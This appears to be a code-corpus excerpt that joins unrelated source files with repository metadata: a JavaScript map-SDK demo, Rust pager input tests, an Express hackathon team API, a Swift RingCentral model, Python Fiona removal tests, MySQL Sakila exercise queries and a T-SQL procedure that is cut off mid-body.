_.each(ids, function(id, index) {
markers[index].id = id;
});
});
});
var markers = [
{
icon: 'home',
markerColor: 'red',
latlng: [-3.23046875, 4.28125]
},
{
icon: 'pizza',
markerColor: 'blue',
latlng: [-4.8203125, 1.265625]
}
];
sdk.onRoomClick(function (event) {
console.log('latlng: ', event.latlng);
var room = event.room;
var div = document.getElementById('map-info');
if (!room) {
div.innerHTML = 'No room was clicked ...';
return;
}
var roomInfo = {
id: room.id,
name: room.name,
users: room.users
};
var content = '<strong>Room Info</strong>';
content += '<pre>' + JSON.stringify(roomInfo, null, 2) + '</pre>';
div.innerHTML = content;
});
sdk.onFvError(function (event) {
var div = document.getElementById('map-errors');
var content = '<pre>' + JSON.stringify(event, null, 2) + '</pre>';
div.innerHTML = content;
});
ping.roomById = function () {
var roomId = document.getElementById('input-room-id').value;
if (roomId) {
sdk.pingByRoomId(roomId);
}
};
ping.roomByName = function () {
var roomName = document.getElementById('input-room-name').value;
if (roomName) {
sdk.pingByRoomName(roomName, {
duration: 10,
color: [255, 0, 0],
});
}
};
select.roomById = function () {
var roomId = document.getElementById('select-room-id').value;
if (roomId) {
sdk.selectRoomById(roomId);
} else {
sdk.unselectRooms();
}
};
select.roomByName = function () {
var roomName = document.getElementById('select-room-name').value;
if (roomName) {
sdk.selectRoomByName(roomName);
} else {
sdk.unselectRooms();
}
};
setMarkers.home = function () {
var checkbox = document.getElementById('home-checkbox');
if (checkbox.checked) {
sdk.showMarkers([markers[0].id]);
} else {
sdk.hideMarkers([markers[0].id]);
}
};
setMarkers.pizza = function () {
var checkbox = document.getElementById('pizza-checkbox');
if (checkbox.checked) {
sdk.showMarkers([markers[1].id]);
} else {
sdk.hideMarkers([markers[1].id]);
}
};
}
document.addEventListener('DOMContentLoaded', main);
| 24.584416 | 97 | 0.60803 | 3.296875 |
7c6f46a5743f6c94a9b6c85c98d454bc3531498b | 11,392 | rs | Rust | src/input/tests.rs | iandwelker/minus | f0498f63598599c270b2340864fb8324ea6ec719 | [
"Apache-2.0",
"MIT"
] | 179 | 2020-11-27T17:49:59.000Z | 2022-03-28T05:33:25.000Z | src/input/tests.rs | iandwelker/minus | f0498f63598599c270b2340864fb8324ea6ec719 | [
"Apache-2.0",
"MIT"
] | 54 | 2020-12-03T20:02:09.000Z | 2022-03-31T10:37:51.000Z | src/input/tests.rs | iandwelker/minus | f0498f63598599c270b2340864fb8324ea6ec719 | [
"Apache-2.0",
"MIT"
] | 14 | 2020-12-04T13:30:21.000Z | 2022-03-31T09:59:25.000Z | #[cfg(feature = "search")]
use crate::SearchMode;
use crate::{input::InputEvent, LineNumbers, Pager};
use crossterm::event::{Event, KeyCode, KeyEvent, KeyModifiers, MouseEvent, MouseEventKind};
// Just a transparent function to fix incompatiblity issues between
// versions
// TODO: Remove this later in favour of how handle_event should actually be called
fn handle_input(ev: Event, p: &Pager) -> Option<InputEvent> {
p.input_classifier.classify_input(
ev,
p.upper_mark,
#[cfg(feature = "search")]
p.search_mode,
p.line_numbers,
// We set `message` to false explicitly, for the sake of correctness
// This will be tested inside a seperate so that it produces the result as expected
false,
p.rows,
)
}
// Keyboard navigation
#[test]
#[allow(clippy::too_many_lines)]
fn test_kb_nav() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Down,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(pager.upper_mark + 1)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Up,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(pager.upper_mark - 1)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('g'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(0)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::PageUp,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
// rows is 5, therefore upper_mark = upper_mark - rows -1
Some(InputEvent::UpdateUpperMark(8)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('g'),
modifiers: KeyModifiers::SHIFT,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MAX)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('G'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MAX)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('G'),
modifiers: KeyModifiers::SHIFT,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MAX)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::PageDown,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
// rows is 5, therefore upper_mark = upper_mark - rows -1
Some(InputEvent::UpdateUpperMark(16)),
handle_input(ev, &pager)
);
}
{
// Half page down
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('d'),
modifiers: KeyModifiers::CONTROL,
});
// Rows is 5 and upper_mark is at 12 so result should be 14
assert_eq!(
Some(InputEvent::UpdateUpperMark(14)),
handle_input(ev, &pager)
);
}
{
// Half page up
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('u'),
modifiers: KeyModifiers::CONTROL,
});
// Rows is 5 and upper_mark is at 12 so result should be 10
assert_eq!(
Some(InputEvent::UpdateUpperMark(10)),
handle_input(ev, &pager)
);
}
{
// Space for page down
let ev = Event::Key(KeyEvent {
code: KeyCode::Char(' '),
modifiers: KeyModifiers::NONE,
});
// rows is 5, therefore upper_mark = upper_mark - rows -1
assert_eq!(
Some(InputEvent::UpdateUpperMark(16)),
handle_input(ev, &pager)
);
}
{
// Enter key for one line down when no message on prompt
let ev = Event::Key(KeyEvent {
code: KeyCode::Enter,
modifiers: KeyModifiers::NONE,
});
// therefore upper_mark += 1
assert_eq!(
Some(InputEvent::UpdateUpperMark(13)),
handle_input(ev, &pager)
);
}
}
#[test]
fn test_restore_prompt() {
let pager = Pager::new().unwrap();
{
// Enter key for one line down when no message on prompt
let ev = Event::Key(KeyEvent {
code: KeyCode::Enter,
modifiers: KeyModifiers::NONE,
});
// therefore upper_mark += 1
assert_eq!(
Some(InputEvent::RestorePrompt),
pager.input_classifier.classify_input(
ev,
pager.upper_mark,
#[cfg(feature = "search")]
SearchMode::Unknown,
LineNumbers::Disabled,
true,
pager.rows
)
);
}
}
#[test]
fn test_mouse_nav() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Mouse(MouseEvent {
kind: MouseEventKind::ScrollDown,
row: 0,
column: 0,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(pager.upper_mark + 5)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Mouse(MouseEvent {
kind: MouseEventKind::ScrollUp,
row: 0,
column: 0,
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::UpdateUpperMark(pager.upper_mark - 5)),
handle_input(ev, &pager)
);
}
}
#[test]
fn test_saturation() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Down,
modifiers: KeyModifiers::NONE,
});
// Pager for local use
let mut pager = Pager::new().unwrap();
pager.upper_mark = usize::MAX;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MAX)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Up,
modifiers: KeyModifiers::NONE,
});
// Pager for local use
let mut pager = Pager::new().unwrap();
pager.upper_mark = usize::MIN;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
assert_eq!(
Some(InputEvent::UpdateUpperMark(usize::MIN)),
handle_input(ev, &pager)
);
}
}
#[test]
fn test_misc_events() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Resize(42, 35);
assert_eq!(
Some(InputEvent::UpdateTermArea(42, 35)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('l'),
modifiers: KeyModifiers::CONTROL,
});
assert_eq!(
Some(InputEvent::UpdateLineNumber(!pager.line_numbers)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('q'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(Some(InputEvent::Exit), handle_input(ev, &pager));
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('c'),
modifiers: KeyModifiers::CONTROL,
});
assert_eq!(Some(InputEvent::Exit), handle_input(ev, &pager));
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('a'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(None, handle_input(ev, &pager));
}
}
#[test]
#[allow(clippy::too_many_lines)]
#[cfg(feature = "search")]
fn test_search_bindings() {
let mut pager = Pager::new().unwrap();
pager.upper_mark = 12;
pager.set_line_numbers(LineNumbers::Enabled);
pager.rows = 5;
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('/'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::Search(SearchMode::Forward)),
handle_input(ev, &pager)
);
}
{
let ev = Event::Key(KeyEvent {
code: KeyCode::Char('?'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
Some(InputEvent::Search(SearchMode::Reverse)),
handle_input(ev, &pager)
);
}
{
// NextMatch and PrevMatch forward search
let next_event = Event::Key(KeyEvent {
code: KeyCode::Char('n'),
modifiers: KeyModifiers::NONE,
});
let prev_event = Event::Key(KeyEvent {
code: KeyCode::Char('p'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
pager.input_classifier.classify_input(
next_event,
pager.upper_mark,
SearchMode::Forward,
pager.line_numbers,
false,
pager.rows
),
Some(InputEvent::NextMatch)
);
assert_eq!(
pager.input_classifier.classify_input(
prev_event,
pager.upper_mark,
SearchMode::Forward,
pager.line_numbers,
false,
pager.rows
),
Some(InputEvent::PrevMatch)
);
}
{
// NextMatch and PrevMatch reverse search
let next_event = Event::Key(KeyEvent {
code: KeyCode::Char('n'),
modifiers: KeyModifiers::NONE,
});
let prev_event = Event::Key(KeyEvent {
code: KeyCode::Char('p'),
modifiers: KeyModifiers::NONE,
});
assert_eq!(
pager.input_classifier.classify_input(
next_event,
pager.upper_mark,
SearchMode::Reverse,
pager.line_numbers,
false,
pager.rows
),
Some(InputEvent::PrevMatch)
);
assert_eq!(
pager.input_classifier.classify_input(
prev_event,
pager.upper_mark,
SearchMode::Reverse,
pager.line_numbers,
false,
pager.rows
),
Some(InputEvent::NextMatch)
);
}
}
| 26.931442 | 91 | 0.509831 | 3.203125 |
9c383efbdd1fb5892c9f9ac60d7dbbe07b5b6dff | 10,009 | js | JavaScript | api/team.js | HackSC/apply-2020 | a240dfd0599dc0b66ba3a77ed4dde806fb6fe009 | [
"MIT"
] | 8 | 2019-09-25T16:20:03.000Z | 2021-02-20T08:53:11.000Z | api/team.js | HackSC/apply-2020 | a240dfd0599dc0b66ba3a77ed4dde806fb6fe009 | [
"MIT"
] | 321 | 2019-09-26T19:07:59.000Z | 2022-02-17T20:47:45.000Z | api/team.js | HackSC/apply-2020 | a240dfd0599dc0b66ba3a77ed4dde806fb6fe009 | [
"MIT"
] | 2 | 2019-09-25T23:27:26.000Z | 2020-02-04T19:59:18.000Z | const express = require("express");
const models = require("./models");
const utils = require("./utils");
const router = express.Router();
router.use(utils.authMiddleware);
router.use(utils.preprocessRequest);
// GET /api/team
// - If a hacker is on a team, get that team info
router.get("/", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
let team = await hackerProfile.getTeam({
include: [
{
model: models.HackerProfile,
as: "members",
attributes: ["firstName", "lastName", "status", "email", "userId"],
},
],
});
if (team) {
return res.json({ team });
} else {
return res.json({
message: "User does not currently belong to a team",
});
}
});
// GET /api/team/:code
// - If provided a team code, retrieve it
router.get("/:code", async (req, res) => {
// Try to find a team with the provided code
const team = await models.Team.findOne({
where: { teamCode: req.params.code || "" },
});
if (!team) {
return res
.status(400)
.json({ message: "Could not find a team with that code" });
} else {
return res.json({ team });
}
});
// POST /api/team
// - If a hacker is not on a team, create a team
router.post("/", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
let team = await hackerProfile.getTeam();
if (team) {
return res.status(500).json({ message: "User already belongs on a team" });
}
let generatedCode = Math.random().toString(36).slice(4, 8).toUpperCase();
while (
await models.Team.findOne({
where: { teamCode: generatedCode },
})
) {
// Regenerate code
generatedCode = Math.random().toString(36).slice(4, 8).toUpperCase();
}
team = await models.Team.create({
name: req.body.name,
teamCode: generatedCode,
ownerId: req.user.id,
description: "",
});
await hackerProfile.update({
teamId: team.id,
lookingForTeam: false,
});
return res.json({
team,
});
});
// DELETE /api/team
// - Attempts to delete a user's current team
router.delete("/", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't join a team if you're already on one!
let team = await hackerProfile.getTeam();
if (!team) {
return res.status(400).json({ message: "User does not belong on a team" });
}
if (team.ownerId === req.user.id) {
// Allow deletion
await models.HackerProfile.update(
{ teamId: null },
{ where: { teamId: team.id } }
);
await models.PendingTeammateRequests.destroy({
where: {
teamId: team.id,
},
});
await team.destroy();
return res.status(200).json({ message: "Team successfully deleted" });
} else {
return res
.status(400)
.json({ message: "You cannot delete a team you don't own" });
}
});
// POST /api/team/join/:code
// - If a hacker is not on a team, attempt to join a team
router.post("/join/:code", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't join a team if you're already on one!
let team = await hackerProfile.getTeam();
if (team) {
return res.status(400).json({ message: "User already belongs on a team" });
}
// Try to find a team with the provided code
team = await models.Team.findOne({
where: { teamCode: req.params.code || "" },
});
if (!team) {
return res
.status(400)
.json({ message: "Could not find a team with that code" });
}
// See if there is still space in the team
const teamMembers = await team.getMembers();
if (teamMembers.length + 1 > 4) {
return res.status(400).json({ message: "This team is full!" });
}
// If we're still here, we can join the team :)
await hackerProfile.setTeam(team);
await models.PendingTeammateRequests.destroy({
where: {
hackerProfileId: req.user.id,
},
});
// if full, update
if (teamMembers.length == 3) {
await models.PendingTeammateRequests.destroy({
where: {
teamId: team.id,
},
});
await team.update({
lookingForTeammates: false,
});
}
return res.status(200).json({
message: "Successfully joined team",
});
});
// POST /api/team/kick/:userid
// - If a hacker is not on a team, attempt to join a team
router.post("/kick/:userid", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't kick someone else from a team if you are not on a team!
let team = await hackerProfile.getTeam();
if (!team) {
return res.status(400).json({ message: "User does not belong on a team" });
}
if (team.ownerId === req.params.userid) {
return res.status(400).json({
message: `Not allowed to kick yourself. Delete the team instead.`,
});
}
if (team.ownerId === req.user.id) {
// Allow kicking
const kickProfile = await models.HackerProfile.findOne({
where: { userId: req.params.userid },
});
let kicked_team = await hackerProfile.getTeam();
if (kicked_team.teamCode == team.teamCode) {
// In the same team, we can kick
await kickProfile.setTeam(null);
return res
.status(200)
.json({ message: `User ${req.params.userid} successfully kicked.` });
}
}
return res.status(400).json({
message: `Could not kick member with userid ${req.params.userid}.`,
});
});
// POST /api/team/kick/:userid
// - If a hacker is not on a team, attempt to join a team
router.post("/kick/:userid", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't kick someone else from a team if you are not on a team!
let team = await hackerProfile.getTeam();
if (!team) {
return res.status(400).json({ message: "User does not belong on a team" });
}
if (team.ownerId === req.params.userid) {
return res.status(400).json({
message: `Not allowed to kick yourself. Delete the team instead.`,
});
}
if (team.ownerId === req.user.id) {
// Allow kicking
const kickProfile = await models.HackerProfile.findOne({
where: { userId: req.params.userid },
});
let kicked_team = await hackerProfile.getTeam();
if (kicked_team.teamCode == team.teamCode) {
// In the same team, we can kick
await kickProfile.setTeam(null);
return res
.status(200)
.json({ message: `User ${req.params.userid} successfully kicked.` });
}
}
return res.status(400).json({
message: `Could not kick member with userid ${req.params.userid}.`,
});
});
// POST /api/team/leave
// - If a hacker is on a team, attempt to leave that team
router.post("/leave", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
// Can't leave a team if you're not in one!
let team = await hackerProfile.getTeam();
if (!team) {
return res
.status(400)
.json({ message: "User does not currently belong to a team" });
}
// Can't leave a team if you own it
if (team.ownerId === req.user.id) {
return res
.status(400)
.json({ message: "You cannot leave this team, you created it" });
}
// If we're still here, we can leave the team :)
await hackerProfile.update({
teamId: null,
});
return res.status(200).json({
message: "Successfully left team",
});
});
// Change visibility
router.put("/visibility", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.user.id },
});
const team = await hackerProfile.getTeam({
include: [
{
model: models.HackerProfile,
attributes: ["firstName", "lastName", "status", "email", "userId"],
},
],
});
const lookingForTeammates = team.lookingForTeammates;
await models.Team.update(
{ lookingForTeammates: !lookingForTeammates },
{
where: {
id: team.id,
},
}
);
return res.send();
});
// Change description
router.put("/description", async (req, res) => {
await models.Team.update(
{ description: req.body.text },
{
where: {
teamCode: req.body.teamCode,
},
}
);
return res.send();
});
// POST /api/team/accept/
// - If a hacker is not on a team, attempt to join a team
router.post("/accept/", async (req, res) => {
const hackerProfile = await models.HackerProfile.findOne({
where: { userId: req.body.hackerId },
});
// Can't join a team if you're already on one!
if (hackerProfile.teamId) {
return res.status(400).json({ message: "User already belongs on a team" });
}
// Try to find a team with the provided code
const team = await models.Team.findOne({
where: { teamCode: req.body.teamCode || "" },
});
if (!team) {
return res
.status(400)
.json({ message: "Could not find a team with that code" });
}
// See if there is still space in the team
const teamMembers = await team.getMembers();
if (teamMembers.length + 1 > 4) {
return res.status(400).json({ message: "This team is full!" });
}
// If we're still here, we can join the team :)
await hackerProfile.setTeam(team);
await hackerProfile.update({
lookingForTeam: false,
});
await models.PendingTeammateRequests.destroy({
where: {
hackerProfileId: req.body.hackerId,
},
});
// if full, update
if (teamMembers.length == 3) {
await models.PendingTeammateRequests.destroy({
where: {
teamId: team.id,
},
});
await team.update({
lookingForTeammates: false,
});
}
return res.status(200).json({
message: "Successfully joined team",
});
});
module.exports = router;
| 25.0225 | 79 | 0.613648 | 3.140625 |
eebf30247aff0a5af676c97ce77741c02458cf70 | 1,055 | swift | Swift | Source/Definitions/RuleInfo.swift | tylerlong/ringcentral-swift-client-back | 39efd3c4989c560ff35a4d126bc81ef767f2d232 | [
"MIT"
] | 1 | 2017-08-23T23:20:29.000Z | 2017-08-23T23:20:29.000Z | Source/Definitions/RuleInfo.swift | tylerlong/ringcentral-swift-client-back | 39efd3c4989c560ff35a4d126bc81ef767f2d232 | [
"MIT"
] | null | null | null | Source/Definitions/RuleInfo.swift | tylerlong/ringcentral-swift-client-back | 39efd3c4989c560ff35a4d126bc81ef767f2d232 | [
"MIT"
] | null | null | null | import Foundation
import ObjectMapper
import Alamofire
open class RuleInfo: Mappable {
// Forwarding number (or group) ordinal
open var `index`: Int?
// Number of rings for a forwarding number (or group)
open var `ringCount`: Int?
// Forwarding number (or group) data
open var `forwardingNumbers`: [RuleInfo_ForwardingNumberInfo]?
public init() {
}
convenience public init(index: Int? = nil, ringCount: Int? = nil, forwardingNumbers: [RuleInfo_ForwardingNumberInfo]? = nil) {
self.init()
self.index = `index`
self.ringCount = `ringCount`
self.forwardingNumbers = `forwardingNumbers`
}
required public init?(map: Map) {
}
open func mapping(map: Map) {
`index` <- map["index"]
`ringCount` <- map["ringCount"]
`forwardingNumbers` <- map["forwardingNumbers"]
}
open func toParameters() -> Parameters {
var result = [String: String]()
result["json-string"] = self.toJSONString(prettyPrint: false)!
return result
}
}
| 32.96875 | 130 | 0.637915 | 3.03125 |
0c90583bb1e8038246e08d81681f08ae3de8075d | 3,738 | py | Python | tests/test_remove.py | sanjaymsh/Fiona | 7be39538f7317efec3e60b8dc722af7e8fea6d52 | [
"BSD-3-Clause"
] | 1 | 2020-03-06T21:13:54.000Z | 2020-03-06T21:13:54.000Z | tests/test_remove.py | sanjaymsh/Fiona | 7be39538f7317efec3e60b8dc722af7e8fea6d52 | [
"BSD-3-Clause"
] | null | null | null | tests/test_remove.py | sanjaymsh/Fiona | 7be39538f7317efec3e60b8dc722af7e8fea6d52 | [
"BSD-3-Clause"
] | 1 | 2021-04-12T05:38:58.000Z | 2021-04-12T05:38:58.000Z | import logging
import sys
import os
import itertools
from .conftest import requires_gpkg
import pytest
import fiona
from fiona.errors import DatasetDeleteError
def create_sample_data(filename, driver, **extra_meta):
meta = {
'driver': driver,
'schema': {
'geometry': 'Point',
'properties': {}
}
}
meta.update(extra_meta)
with fiona.open(filename, 'w', **meta) as dst:
dst.write({
'geometry': {
'type': 'Point',
'coordinates': (0, 0),
},
'properties': {},
})
assert(os.path.exists(filename))
drivers = ["ESRI Shapefile", "GeoJSON"]
kinds = ["path", "collection"]
specify_drivers = [True, False]
test_data = itertools.product(drivers, kinds, specify_drivers)
@pytest.mark.parametrize("driver, kind, specify_driver", test_data)
def test_remove(tmpdir, kind, driver, specify_driver):
"""Test various dataset removal operations"""
extension = {"ESRI Shapefile": "shp", "GeoJSON": "json"}[driver]
filename = "delete_me.{extension}".format(extension=extension)
output_filename = str(tmpdir.join(filename))
create_sample_data(output_filename, driver=driver)
if kind == "collection":
to_delete = fiona.open(output_filename, "r")
else:
to_delete = output_filename
assert os.path.exists(output_filename)
if specify_driver:
fiona.remove(to_delete, driver=driver)
else:
fiona.remove(to_delete)
assert not os.path.exists(output_filename)
def test_remove_nonexistent(tmpdir):
"""Attempting to remove a file that does not exist results in an IOError"""
filename = str(tmpdir.join("does_not_exist.shp"))
assert not os.path.exists(filename)
with pytest.raises(IOError):
fiona.remove(filename)
@requires_gpkg
def test_remove_layer(tmpdir):
filename = str(tmpdir.join("a_filename.gpkg"))
create_sample_data(filename, "GPKG", layer="layer1")
create_sample_data(filename, "GPKG", layer="layer2")
create_sample_data(filename, "GPKG", layer="layer3")
create_sample_data(filename, "GPKG", layer="layer4")
assert fiona.listlayers(filename) == ["layer1", "layer2", "layer3", "layer4"]
# remove by index
fiona.remove(filename, layer=2)
assert fiona.listlayers(filename) == ["layer1", "layer2", "layer4"]
# remove by name
fiona.remove(filename, layer="layer2")
assert fiona.listlayers(filename) == ["layer1", "layer4"]
# remove by negative index
fiona.remove(filename, layer=-1)
assert fiona.listlayers(filename) == ["layer1"]
# invalid layer name
with pytest.raises(ValueError):
fiona.remove(filename, layer="invalid_layer_name")
# invalid layer index
with pytest.raises(DatasetDeleteError):
fiona.remove(filename, layer=999)
def test_remove_layer_shapefile(tmpdir):
"""Removal of layer in shapefile actually deletes the datasource"""
filename = str(tmpdir.join("a_filename.shp"))
create_sample_data(filename, "ESRI Shapefile")
fiona.remove(filename, layer=0)
assert not os.path.exists(filename)
def test_remove_layer_geojson(tmpdir):
"""Removal of layers is not supported by GeoJSON driver
The reason for failure is slightly different between GDAL 2.2+ and < 2.2.
With < 2.2 the datasource will fail to open in write mode (IOError), while
with 2.2+ the datasource will open but the removal operation will fail (not
supported).
"""
filename = str(tmpdir.join("a_filename.geojson"))
create_sample_data(filename, "GeoJSON")
with pytest.raises((RuntimeError, IOError)):
fiona.remove(filename, layer=0)
assert os.path.exists(filename)
| 31.677966 | 81 | 0.677368 | 3.109375 |
c527ea84b5a4b47622dc40d44bd32c77b01e9b4f | 3,887 | sql | SQL | mySQL_test.sql | sadafmehds/mySQL_test | 84e02cb07d80d6fad4c9dac28cd2ca0c2befc41c | [
"MIT"
] | null | null | null | mySQL_test.sql | sadafmehds/mySQL_test | 84e02cb07d80d6fad4c9dac28cd2ca0c2befc41c | [
"MIT"
] | null | null | null | mySQL_test.sql | sadafmehds/mySQL_test | 84e02cb07d80d6fad4c9dac28cd2ca0c2befc41c | [
"MIT"
] | null | null | null | USE sakila;
-- 1a). Display first names and last names from table actor
SELECT first_name, last_name
FROM actor;
-- 1b).
SELECT CONCAT(first_name, ' ', last_name) AS 'Actor Name' FROM actor;
-- Practice: Testing going to lower case from upper case
SET SQL_SAFE_UPDATES=0;
UPDATE actor
SET first_name = LOWER(first_name)
WHERE LOWER(first_name) = first_name;
-- 2a)
SELECT*FROM actor WHERE first_name='JOE';
-- 2b)
SELECT*FROM actor WHERE last_name LIKE '%GEN%';
-- 2c) reorder columns and select from one column the cells that contain 'LI'
ALTER TABLE actor MODIFY COLUMN first_name VARCHAR(100) AFTER last_name;
SELECT*FROM actor WHERE last_name LIKE '%LI%';
SELECT*FROM country;
-- 2d)
SELECT country_id,country
FROM country
WHERE country IN ('Afghanistan','Bangladesh','China');
-- 3a)
ALTER TABLE actor ADD COLUMN middle_name VARCHAR(100) AFTER last_name;
SELECT*FROM actor;
-- 3b).
ALTER TABLE actor MODIFY COLUMN middle_name BLOB;
-- 3c).
ALTER TABLE actor DROP COLUMN middle_name;
SELECT*FROM actor;
-- 4a) Count how many of each last name there is in the last_name column
SELECT last_name, COUNT(*)
FROM actor
GROUP BY last_name;
-- 4b).
SELECT last_name, COUNT(*)
FROM actor
GROUP BY last_name
HAVING COUNT(*)>1;
-- 4c).
UPDATE actor
SET first_name='HARPO'
WHERE first_name='GROUCHO';
-- 4d)
UPDATE actor
SET first_name='GROUCHO'
WHERE first_name='HARPO';
-- 5a).
SHOW CREATE TABLE address;
-- CREATE TABLE `address` (\n `address_id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,\n `address` varchar(50) NOT NULL,\n `address2` varchar(50) DEFAULT NULL,\n `district` varchar(20) NOT NULL,\n `city_id` smallint(5) unsigned NOT NULL,\n `postal_code` varchar(10) DEFAULT NULL,\n `phone` varchar(20) NOT NULL,\n `location` geometry NOT NULL,\n `last_update` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\n PRIMARY KEY (`address_id`),\n KEY `idx_fk_city_id` (`city_id`),\n SPATIAL KEY `idx_location` (`location`),\n CONSTRAINT `fk_address_city` FOREIGN KEY (`city_id`) REFERENCES `city` (`city_id`) ON UPDATE CASCADE\n) ENGINE=InnoDB AUTO_INCREMENT=606 DEFAULT CHARSET=utf8
-- 6a).
-- address: address id, address, district, city id, postal code, phone, location, last update
-- staff: staff id, first name, last name, address id, picture, email, store id, actuve, username, password, last update
SELECT first_name, last_name, address
FROM address a
JOIN staff s
ON (s.address_id=a.address_id);
-- OR
SELECT first_name, last_name, address
FROM staff
JOIN address
USING (address_id);
SELECT first_name, last_name, address
FROM staff
JOIN address
USING (address_id);
-- 6b). ask about join method later, used a diff way
select*from staff;
select*from payment;
-- payment: payment_id,cutomer_id,amount, rental_id, staff_id, payment_date, last_update
-- staff: staff id, first name, last name, address id, picture, email, store id, actuve, username, password, last update
select year(payment_date) as y, month(payment_date) as m, staff_id as staff_no, sum(amount) as p
from payment
group by year(payment_date), month(payment_date), staff_no;
-- 6c). Get counts of actors in each movie via inner merge
select*from film; -- film_id,title,description,
select*from film_actor; -- actor_id,film_id
select film.title,count(actor_id)
from film
inner join film_actor on film.film_id=film_actor.film_id
GROUP by title;
-- 6d).
select*from inventory;
select*from film;
select count(*) as copy_number
from inventory
where film_id in
(
select film_id
from film
where title='Hunchback Impossible');
-- 6e).
-- 6e).
select*from payment; -- customer_id,payment_id, staff_id, amount
select*from customer; -- customer_id,store_id, first_name, last_name, email
select first_name, last_name,sum(amount)
from payment p
join customer c
on (c.customer_id=p.customer_id)
GROUP BY first_name,last_name
ORDER BY last_name; | 28.792593 | 717 | 0.752508 | 3.09375 |
618a0366f180ec51c4a6cb43f27cc9a4911e8436 | 854 | sql | SQL | Database Basics/MSSQL Server Exam - 22 October 2017/MSSQL Server Exam - 22 October 2017/18. Assign Employee .sql | stoyanovmiroslav/CSharp-DB-Fundamentals-SoftUni | d764eead3f40c608d4caf55d5f9d3d96cbeccf93 | [
"MIT"
] | 2 | 2019-03-03T08:33:14.000Z | 2019-03-13T07:38:38.000Z | Database Basics/MSSQL Server Exam - 22 October 2017/MSSQL Server Exam - 22 October 2017/18. Assign Employee .sql | stoyanovmiroslav/CSharp-DB-Fundamentals-SoftUni | d764eead3f40c608d4caf55d5f9d3d96cbeccf93 | [
"MIT"
] | null | null | null | Database Basics/MSSQL Server Exam - 22 October 2017/MSSQL Server Exam - 22 October 2017/18. Assign Employee .sql | stoyanovmiroslav/CSharp-DB-Fundamentals-SoftUni | d764eead3f40c608d4caf55d5f9d3d96cbeccf93 | [
"MIT"
] | 2 | 2019-02-06T10:12:00.000Z | 2019-02-06T10:30:14.000Z | CREATE PROC usp_AssignEmployeeToReport(@employeeId INT, @reportId INT)
AS
BEGIN TRAN
UPDATE Reports
SET EmployeeId = @employeeId
WHERE Id = @reportId
DECLARE @EmployeeDepartmentId INT = (SELECT e.DepartmentId
FROM Employees AS e
WHERE Id = @employeeId)
DECLARE @ReportDepartmentId INT = (SELECT c.DepartmentId
FROM Reports AS r
JOIN Categories AS c
ON c.Id = r.CategoryId
WHERE r.Id = @reportId)
IF(@EmployeeDepartmentId <> @ReportDepartmentId)
BEGIN
ROLLBACK;
